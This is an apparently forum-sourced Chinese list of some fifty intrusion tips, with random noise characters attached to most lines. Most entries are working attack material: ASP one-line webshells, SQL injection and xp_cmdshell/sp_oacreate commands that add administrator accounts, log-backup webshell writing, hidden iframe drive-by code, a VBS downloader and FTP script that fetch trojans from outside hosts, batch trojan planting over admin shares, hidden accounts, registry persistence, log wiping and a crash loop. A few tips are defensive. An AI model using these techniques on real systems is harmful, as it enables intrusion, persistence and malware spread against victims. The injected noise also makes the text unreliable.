1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下, U1 N7 W$ _6 u3 \8 I \& R
cacls C:\windows\system32 /G hqw20:R
- i- y, U9 p$ G8 T# [& u- S6 s思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
2 q2 o! H$ t. M! d+ K5 a恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
. J g6 U0 A) A
0 n) @: a: `8 K8 y2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。) j: |) ?1 l* Z! T0 K) L
( F5 s8 d; j; l3 c+ Y+ `3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
% E% a4 S2 A4 W( \6 N
2 N5 M3 i [5 E5 M l: D9 D* |4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号! b$ y, m, C( R2 @
@3 @7 v; O. w" I+ c2 ?7 w
5、利用INF文件来修改注册表9 E6 n a4 J2 e0 Q3 \" O
[Version], @! v- F$ ]. p1 p% f4 b6 l
Signature="$CHICAGO$"
, f" n% _/ W. R9 t" [[Defaultinstall]( W- P8 b0 W1 r2 Q6 a9 i i& Q
addREG=Ating
; w6 y1 t( d+ O7 ~' d v[Ating]
7 z5 _$ B2 g& \! {1 K" @HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
$ l; Q7 }0 j/ Y* _: M2 ?* m0 @以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
+ k p; A7 b( C$ w2 x* trundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径# T! f; P, C( d8 M. `- |/ L. H) V. Q
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU* ^/ i7 M6 E8 e! a4 p
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU! m" J% o% K& l5 n, U. ]
HKEY_CURRENT_CONFIG 简写为 HKCC
- B, W* o7 z& G% B: B ?! r$ B% v0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
4 }& H- q" f; h4 J$ d! n"1"这里代表是写入或删除注册表键值中的具体数据
$ [1 C, \' b( V( H( Y1 [* ?0 O& G: D" I! E& P# ?# M5 f2 P. G3 L
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
% Q; U/ r) \# h9 o6 A8 n$ S多了一步就是在防火墙里添加个端口,然后导出其键值
3 @3 l) C4 K. {3 B+ {8 s[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]) d X* A* s, i: d
+ Q: p/ e" b }' R: }1 p$ K- C, @
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽( @* s4 S# s8 O/ ^# ?" R
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
1 Z$ ~3 p3 M; V! V9 }# Y+ g- i' {2 M8 J" {
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
- W5 F8 G' S/ ~
2 f6 O& }5 B3 l- w9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,% c5 `6 M3 r- O) V* A' S
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
4 p' E5 z" J2 }3 q' y6 ^& h0 K' k* H( w$ v1 d& U) [
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”- Z k* i6 l) K4 ~) Q, V# i! r
4 r! c7 t- ?) M2 _) G2 P% a11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
5 Q. e" f+ k g+ f1 e& o用法:xsniff –pass –hide –log pass.txt
+ w; K$ E# y1 l0 J* d% y; E `
/ |$ a5 x9 u9 v$ M/ Y12、google搜索的艺术, J8 @+ ?' H3 h
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”. i: I7 z" }5 U3 R3 x, P* O
或“字符串的语法错误”可以找到很多sql注入漏洞。
' C! ?* h( \1 F. i+ n& u7 r% e* N; e( g1 B% Y* n+ ]
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
2 _) X6 ~$ s. ?3 Y m& E8 ^1 K3 A. `& p$ M3 P, y. V: O& Y
14、cmd中输入 nc –vv –l –p 1987! h. o q- T# }5 T
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
2 Y+ U# s/ m+ m
[0 Q" D. T! m3 ] ~7 d15、制作T++木马,先写个ating.hta文件,内容为
/ O2 v3 t7 P4 G+ j( l% Y<script language="VBScript">3 p& s3 c5 K& _6 `4 v% j
set wshshell=createobject ("wscript.shell" ), N/ Y/ G! l0 r' H$ v: p
a=wshshell.run("你马的名称",1)
0 G+ F- x1 Q/ Dwindow.close
3 |7 y: @/ L0 q& \</script>7 Q8 g% o& g! I- H T
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。5 L( Z: H0 @$ |
2 t- A2 s+ N) y4 B
16、搜索栏里输入
+ K L' z w% b关键字%'and 1=1 and '%'='
( o/ r1 U7 e9 ]+ N关键字%'and 1=2 and '%'='# J5 E1 N/ w3 V# c# K! I
比较不同处 可以作为注入的特征字符/ o; ?, ~" f( C
2 O Q2 n0 U$ K6 v
17、挂马代码<html> I1 f8 B* H; I6 s
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
) d4 g0 i) j- K1 ^( {; ~</html>
3 a8 a. p6 L2 f! \
2 c! P; k, ?, M$ f5 m18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,* G5 }8 I8 `3 J
net localgroup administrators还是可以看出Guest是管理员来。
6 p6 t/ ?4 X; Q
) M4 l1 P" T# z' m. ~+ L0 t2 K19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
2 g" c2 b- p, `2 m! \ c用法: 安装: instsrv.exe 服务名称 路径2 G+ R) u% S! E: f+ r
卸载: instsrv.exe 服务名称 REMOVE r$ I8 q- `* F1 c( \: ?
- p/ H" f4 n4 \0 @
3 Q+ i3 k* s7 p4 X& k: b21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉' t+ L5 n8 b% M* I
不能注入时要第一时间想到%5c暴库。8 v" U1 i- @) [' s
" H& ?1 K! |6 R! N5 t
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
6 \3 v% N; ~& e' K/ q9 b$ s7 V/ `. H# @, U0 O# j/ O
23、缺少xp_cmdshell时
) K% W% ?& B7 k尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'4 q# t- M( P- L! c: T1 Y
假如恢复不成功,可以尝试直接加用户(针对开3389的)7 p" W; z& S& ~" e' H
declare @o int
' g* E' ~0 Q/ G ?exec sp_oacreate 'wscript.shell',@o out9 H: V3 g. \$ v/ ^/ b& R
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
* K$ N! o1 t, @! f; t) `# g" X) h: D( G! p# o: r1 T/ K
24.批量种植木马.bat
. Y3 b) Q/ x1 B0 Rfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
R0 Q& W" w! G( V3 C! Q& R* Ufor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
( n Q9 z& x3 y1 {扫描地址.txt里每个主机名一行 用\\开头) {* @; W! d/ V2 d! i' l' p, H2 p
P3 h1 V, o6 z! L4 T
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
) H2 @- ?% Z' c- ^
4 Q9 X0 B3 N* ^, M( U26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.* i5 O# T' M C; \/ L4 T# F0 e
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
4 t6 z/ T( @. {$ m+ U.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
: V/ E9 K$ x/ V$ e5 r- ?6 i* v# S+ P8 ?
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP/ Z0 i9 V1 R& T7 \
然后用#clear logg和#clear line vty *删除日志5 G6 E( ~& k8 G# K4 L
( J1 L, q% c) T
28、电脑坏了省去重新安装系统的方法8 g! H' R6 {; d5 }
纯dos下执行,' ~' `+ \5 c7 S
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
, z4 p4 v+ B% @% Y" z7 \. B# r/ o2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config) r; N2 u' `! p6 j, p1 ^. O, U
$ Y5 k+ f3 V% a/ @
29、解决TCP/IP筛选 在注册表里有三处,分别是:
, |! U; j9 K, y5 t6 i, THKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip1 {+ q$ A( d! h: Z
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
# |6 c, h+ k0 |4 p) e6 V ]HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
5 D$ Z3 ~0 W! e分别用
9 ?, p3 h( K. ~% z: V! w7 Uregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip& q2 }0 r8 r0 K1 d$ `/ h( F
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
% n+ i1 n) y! Wregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip- W% l: V" d9 ]: N8 u6 \8 X1 y" T
命令来导出注册表项, x' S6 z# ? \4 _$ ?0 e" H
然后把三个文件里的EnableSecurityFilters"=dword:00000001,0 h# n/ y$ y- F0 R
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用, g6 c2 A. t: z6 {
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
/ t1 `. ~5 i# z- ?% x, f l$ ~ J# D. H
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U3 |# l) m! T7 }3 g% T
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
4 F4 R5 c, i9 i, U* }6 O; C- H$ F0 k! ?; b$ z
31、全手工打造开3389工具/ z! m5 s( V8 n8 f! p% X3 @9 c
打开记事本,编辑内容如下:
: ~1 g+ m2 g9 ?echo [Components] > c:\sql
1 @( S! Z- r! D6 m1 G. T/ j9 lecho TSEnable = on >> c:\sql0 o0 [2 @" x* F4 k* Z
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
* m( t0 S* W' ?/ x* R: l编辑好后存为BAT文件,上传至肉鸡,执行
" _2 i# G& B/ R% Q6 |5 M6 q' ?/ ^& ~ N. M' S) ?! N- t
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
8 B+ ^ S% l( v2 L5 Y* _ ~9 [1 Y' W# ]* \+ s/ d8 Y
33、让服务器重启
% E# J5 o. D0 M- L- u3 E7 R5 m6 @" D写个bat死循环:
/ }, ~& `0 c* l/ |$ r7 O" t) C! [@echo off
- U: ~# P3 x2 R, v$ y6 ~/ ^:loop1
/ D+ ] l4 r. H5 g. E) L4 `cls& l2 n+ f0 L0 I; ~7 P
start cmd.exe- x* r+ \# A7 f
goto loop1
' ~# S9 ^5 O) y保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
( n: n! F% \' x" g2 h/ L1 H3 `5 W' f
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,4 s0 _0 L7 x! G+ {& J7 ]
@echo off/ I6 a9 v2 G9 T: ^% C
date /t >c:/3389.txt
+ g* c$ U6 {0 _+ p) ]; w) rtime /t >>c:/3389.txt
. S4 r3 N3 s0 M" d7 H6 R$ w( Aattrib +s +h c:/3389.bat
" B8 V( k: {* p7 O: E% B4 }) \ sattrib +s +h c:/3389.txt" C5 c- L0 _* f% t* j. Q# g
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
$ J) L5 v5 A8 a, A0 n; [/ B并保存为3389.bat/ O* F% ^* Q$ L$ [
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号6 o% \" ] E5 U6 S
& r7 r: z; |, Y/ f, k3 ?, T! \35、有时候提不了权限的话,试试这个命令,在命令行里输入:
8 n- N3 V7 J" P2 }1 _, Estart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
; R6 t: Y0 f4 L" e3 ^4 ?输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。) z* q' S4 M# r3 f
) W, `# o4 N, F5 u36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件 x* Q: u% Z. P" b: M4 j* m4 W, [7 p; B4 p
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址9 I+ u; Q1 |% j; @8 v& z
echo 你的FTP账号 >>c:\1.bat //输入账号
7 @% @/ g) V4 R; a+ {: Decho 你的FTP密码 >>c:\1.bat //输入密码
, N$ j B4 b. I( t9 i$ Eecho bin >>c:\1.bat //登入
7 A; e; ~! N) Z& b& V2 aecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么+ x1 ?4 x' x$ u1 \; g4 D2 o) i, `# q
echo bye >>c:\1.bat //退出
; Z' E! _$ a0 J7 |4 `3 `然后执行ftp -s:c:\1.bat即可+ S: c/ e! e( H3 ~2 N+ P: `
/ s" T! q0 A, q3 e: ?( M' z37、修改注册表开3389两法% o1 _! U/ v8 B, v) S9 k% g; Y/ f+ b$ n
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
9 m. S9 _" G8 N" b Xecho Windows Registry Editor Version 5.00 >>3389.reg* q8 Q1 L% ^, [- ?0 \9 f% j7 k$ b
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg6 _- i* C7 a, _
echo "Enabled"="0" >>3389.reg1 N' F. t( h; Y- v0 c) M
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
: @% b1 n1 \0 A0 \4 NNT\CurrentVersion\Winlogon] >>3389.reg5 V, d2 |9 J ~2 O% N
echo "ShutdownWithoutLogon"="0" >>3389.reg) ~* X8 p& G* Q& d4 w
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
+ z3 v2 t0 o$ e) ~1 Y S>>3389.reg) g7 T+ \8 F6 S2 \+ H7 ^
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
4 a% a$ q# q4 }9 M# \! c* A7 [+ Decho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]! `4 U6 Q3 q, b3 t
>>3389.reg* ]7 M# q2 y' Z$ P; d2 x
echo "TSEnabled"=dword:00000001 >>3389.reg
2 B* \ I5 {( jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg7 S9 Z6 a9 s/ A, I' h6 \
echo "Start"=dword:00000002 >>3389.reg& s+ P' L" T6 T9 r" o8 J
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService], V' I4 T' G7 B# v: I
>>3389.reg
$ M! O) Y# I' w% c; O$ @echo "Start"=dword:00000002 >>3389.reg
, r' h- E# f& x6 h6 X' Kecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
/ A. W2 E' U2 ^% |. f3 \0 techo "Hotkey"="1" >>3389.reg$ \& q' L3 L# K! A5 C
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
) Z9 a5 ~, X& p6 h8 FServer\Wds\rdpwd\Tds\tcp] >>3389.reg/ g! y$ O0 c& n" v U9 o2 A
echo "PortNumber"=dword:00000D3D >>3389.reg
3 w) z, q. E3 d: M l3 e- b* }" [echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal7 n/ q& m9 O7 h. w; O- X
Server\WinStations\RDP-Tcp] >>3389.reg0 v5 T2 H6 V8 L: o- P' b
echo "PortNumber"=dword:00000D3D >>3389.reg5 s+ z& _0 @% @1 _ t
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
' v" L2 z1 f5 o(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
" r7 J4 s6 w; v0 w因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
% M6 q: z& L1 j1 H: z(2)winxp和win2003终端开启
. n" H8 r q" P# }4 B用以下ECHO代码写一个REG文件:
" w/ W% u r9 Q( G# c1 Gecho Windows Registry Editor Version 5.00>>3389.reg
q2 m8 |$ N, z( z: r1 Kecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal& |' A6 [ v# P- Z, z
Server]>>3389.reg- A, \8 h. h6 ^% w6 C0 H
echo "fDenyTSConnections"=dword:00000000>>3389.reg
6 S( o2 ~$ B) wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal: B* u" e8 ^7 A8 a' W9 u. K
Server\Wds\rdpwd\Tds\tcp]>>3389.reg2 o5 `$ b$ F/ B$ i3 H1 n* Y" W
echo "PortNumber"=dword:00000d3d>>3389.reg; g( ~' M% x) V* a; p5 I
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal) U% Y ^% R% o2 D
Server\WinStations\RDP-Tcp]>>3389.reg$ {8 V' l3 z) y0 w p
echo "PortNumber"=dword:00000d3d>>3389.reg
6 z/ m5 E. a0 `9 s \9 @: d4 P然后regedit /s 3389.reg del 3389.reg9 T$ _9 \9 v! L" z1 M, n
XP下不论开终端还是改终端端口都不需重启, J9 V; z b/ s; H9 l5 ^
H8 ~' ~# V+ G' x7 ?: d3 `
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃( C' F' q& u" c( G+ M7 a1 u
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'' e$ v5 {1 D1 x( s0 n
& b% ]/ E6 w$ T' F* B* e- J39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
) N6 c& n+ _2 i7 a+ h(1)数据库文件名应复杂并要有特殊字符
# z" ?: j5 ?1 o+ L1 O. q- ~% d(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
# _9 U4 W( ]4 @& w, |将conn.asp文档中的8 f, ~$ ?) `- [% H6 i
DBPath = Server.MapPath("数据库.mdb")
: P% e; j5 m! O1 M, E! Fconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
7 ^' P; J* }. B3 A; W8 E2 W. f8 \. c: M( Z. w" m) ^- _
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置% [# }' W/ g2 t! \ B/ V+ \! a
(3)不放在WEB目录里
5 P9 n% z" O: F0 l; _
) ?4 Z; \0 C' q40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
* G5 h0 u; V0 E- S G+ @8 a可以写两个bat文件; {9 i- G+ ]* v/ o! ?
@echo off9 o8 s$ s& t2 ^
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe5 V2 E" X, W/ K: Y
@del c:\winnt\system32\query.exe5 g" T% Y/ ]& p% |) |8 ? `
@del %SYSTEMROOT%\system32\dllcache\query.exe
3 W! p, ?# q0 @' ]1 R@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的! D. J# ?6 Q1 j+ s" O; \
0 v& f; |5 F2 j& @- _3 y@echo off
. f/ _; x' {3 u* Q6 E6 Q@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
0 k+ |& C; m: B. j@del c:\winnt\system32\tsadmin.exe
t/ ~ {( ~& A1 ^7 C* o) K@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex) O- `! D' h1 i. z
1 K2 I$ E |) U a
41、映射对方盘符! H% O; ~5 O$ T2 X+ \ J
telnet到他的机器上,4 {) D2 `1 b% @* W3 {; X9 ?( ~) e
net share 查看有没有默认共享 如果没有,那么就接着运行
5 o) o# v+ O1 \' Cnet share c$=c:: d4 L1 ^( L1 E& b/ u, `1 Z! I
net share现在有c$
' v% l" f& x# N' i7 D, [/ y在自己的机器上运行8 L Y1 K; c- R0 f- {6 Z
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K: ^. q6 q/ b5 L! [5 [
/ N) T5 B/ S+ T9 C6 M42、一些很有用的老知识. q7 T# U+ V8 r0 A3 Z
type c:\boot.ini ( 查看系统版本 )1 S% z a, M. R W; X& n$ }
net start (查看已经启动的服务)8 {# {6 z! Y7 w- \% g2 ^) S1 y
query user ( 查看当前终端连接 ). C% x2 x. b; t9 [1 [/ ~
net user ( 查看当前用户 )
. f" c: O# e) y9 Knet user 用户 密码/add ( 建立账号 )
3 N5 A0 h! `% ~5 a9 r* V6 J# fnet localgroup administrators 用户 /add (提升某用户为管理员): k: v! S! N. C, v
ipconfig -all ( 查看IP什么的 )- h' t+ t" {9 ~! X/ j" F# a4 U& {
netstat -an ( 查看当前网络状态 )
- ]/ Y* V3 q I5 \) Lfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)0 r0 @0 O4 I0 ?
克隆时Administrator对应1F4
/ r& f1 s2 g. @# iguest对应1F5 H- d/ C2 z2 ~% g
tsinternetuser对应3E8
3 Y: A: n/ P% K, C* G. s+ O' f
2 K7 g4 [0 P" D/ o! s k; O43、如果对方没开3389,但是装了Remote Administrator Service
, z( q) E- {9 x* n6 h用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
4 l$ i" V$ ~8 M# m- o解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
# q3 X( R7 G9 N* m先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
4 o. S1 m* q6 H$ J. r. H
1 H. W7 D, S( f( J' j44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定) e+ z, M3 m4 P7 y, C
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)) I. d, X/ n' S
4 t3 }- {- Z% J+ G9 [7 p/ K
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
( ?5 _. [5 e# Q: W& ^% J: W# Secho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open6 s1 ?8 U- q7 G/ J, @( o; ?! V
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
: f5 a. R/ Q9 F0 w7 VCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =: q" K, `4 l: F8 J5 E
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
% E4 r. |" D6 |; j: s& E(这是完整的一句话,其中没有换行符)- o1 Z" H! z9 y1 E6 f& W
然后下载:
& a" N i5 V4 j. Mcscript down.vbs http://www.hack520.org/hack.exe hack.exe ~& u7 u3 z' h' m# ^
4 M3 E3 ?; R/ u. x/ a: J
46、一句话木马成功依赖于两个条件:( g6 G0 s/ }7 T: T' m: u+ m) @
1、服务端没有禁止adodb.Stream或FSO组件! W4 T; ~% e H% {2 X7 f
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
# l7 x# P7 k/ M# P+ G
. m0 Y8 {; N0 t6 g4 u47、利用DB_OWNER权限进行手工备份一句话木马的代码:8 d# W; a; k6 J7 s# V8 J/ X
;alter database utsz set RECOVERY FULL--
' B B7 j3 l H;create table cmd (a image)--2 C2 F; Q5 F- ?: w
;backup log utsz to disk = 'D:\cmd' with init--% \% P; c9 w5 g
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--" I" k: y) y$ Y* j! x
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
9 j* s$ K& m4 r4 E" i' W注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
% m+ X8 g+ g- {( B) z0 }' d2 H4 A+ l6 ]1 d" m1 b
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
# V" G% D& K0 F# O' f3 L' h, L9 Z/ V
& c( i2 d1 u* O! Z5 H& ^用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
$ b% l' m! V* w: K% j* U4 _, L: d所有会话用 'all'。) F) e% ?8 E: p% b
-s sessionid 列出会话的信息。
; U. q2 ]6 a5 Y% g7 R9 Y4 B-k sessionid 终止会话。" m. g5 |# B3 X/ C1 n" {; k
-m sessionid 发送消息到会话。 g1 ^( g' q8 m+ j& U C9 C( G
6 p ?! A6 {, t6 Bconfig 配置 telnet 服务器参数。8 }* _% u7 B: P4 d
- Q& ]" X+ y; u [common_options 为:
8 E7 w- x9 |/ k- Z) B: E4 Q-u user 指定要使用其凭据的用户
+ o* D. T2 U) k& |7 w( S-p password 用户密码
0 q! T8 p2 `; \" g1 {* u) N4 \5 z( K0 Q! M$ l0 d1 I, K" `5 R
config_options 为:
6 f' L5 L0 a% s, Tdom = domain 设定用户的默认域+ T1 Q0 e0 V: P# o" ]. q
ctrlakeymap = yes|no 设定 ALT 键的映射
& Y$ o! J2 |$ ^& b/ K0 b4 C P# utimeout = hh:mm:ss 设定空闲会话超时值" a3 Q+ V* m9 |! F( ]
timeoutactive = yes|no 启用空闲会话。
5 h) Z1 J; J" `8 A! y0 B) ~. }maxfail = attempts 设定断开前失败的登录企图数。3 C2 q0 q; X2 S2 h: o
maxconn = connections 设定最大连接数。
" X# _9 p+ c3 Z" T6 Yport = number 设定 telnet 端口。
0 Q# R9 P6 O5 Y* U; f+ t! M" c( ~sec = [+/-]NTLM [+/-]passwd
7 V% ^& D _+ N5 p2 r6 T设定身份验证机构. J" V/ W9 `1 F7 C1 k2 t
fname = file 指定审计文件名。
, f6 n* ~- \0 a! Jfsize = size 指定审计文件的最大尺寸(MB)。
# C( R' e, F( tmode = console|stream 指定操作模式。
( Q0 `) S0 p: i1 [$ L' s u% [auditlocation = eventlog|file|both
% p, w B. J( C7 G指定记录地点
. i% v4 l7 |. }% ~audit = [+/-]user [+/-]fail [+/-]admin
: u+ c4 [5 R, x9 J4 P( b3 `7 E8 f& V, ~* \5 @4 ^4 K# |% s' w
49、例如:在IE上访问:
0 S1 z) H9 B# V5 y1 C+ F8 Awww.hack520.org/hack.txt就会跳转到http://www.hack520.org/$ E! U' z2 G. M S
hack.txt里面的代码是:
8 T6 f4 u% d: J<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/"># ^6 d: `' @$ \( N6 A3 P/ x
把这个hack.txt发到你空间就可以了!
9 t: j' I2 d7 c7 L! Y这个可以利用来做网马哦!
, p* s8 I- I6 s; Z" h r8 v
# ?- C: K' b" c; f, {9 m7 U& @50、autorun的病毒可以通过手动限制!! A3 k) U& J# X
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!( k3 l5 Y1 ?8 `/ `: I3 {
2,打开盘符用右键打开!切忌双击盘符~
$ h% o9 D/ K* ?5 S" z3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
! Y ^) \4 V9 L' m! K" U+ X; l9 Y& B
51、log备份时的一句话木马:
X0 Z5 U# E! W: Pa).<%%25Execute(request("go"))%%25>
) g# H! I$ b2 T$ Qb).<%Execute(request("go"))%>
- h6 N+ Q. z% v+ Mc).%><%execute request("go")%><%) q& e5 ^3 L) _ j3 f4 f; l5 n
d).<script language=VBScript runat=server>execute request("sb")</Script>3 ~$ j$ a* g! p7 }6 s. L
e).<%25Execute(request("l"))%25>
2 o4 G& k+ j& d) Sf).<%if request("cmd")<>"" then execute request("pass")%>: X, s, x8 v( a0 b/ P
" ], t* }( ]. N3 {+ h' o7 ]+ G) y52、at "12:17" /interactive cmd
+ _+ A& W" j* C5 [1 p% @, g执行后可以用AT命令查看新加的任务
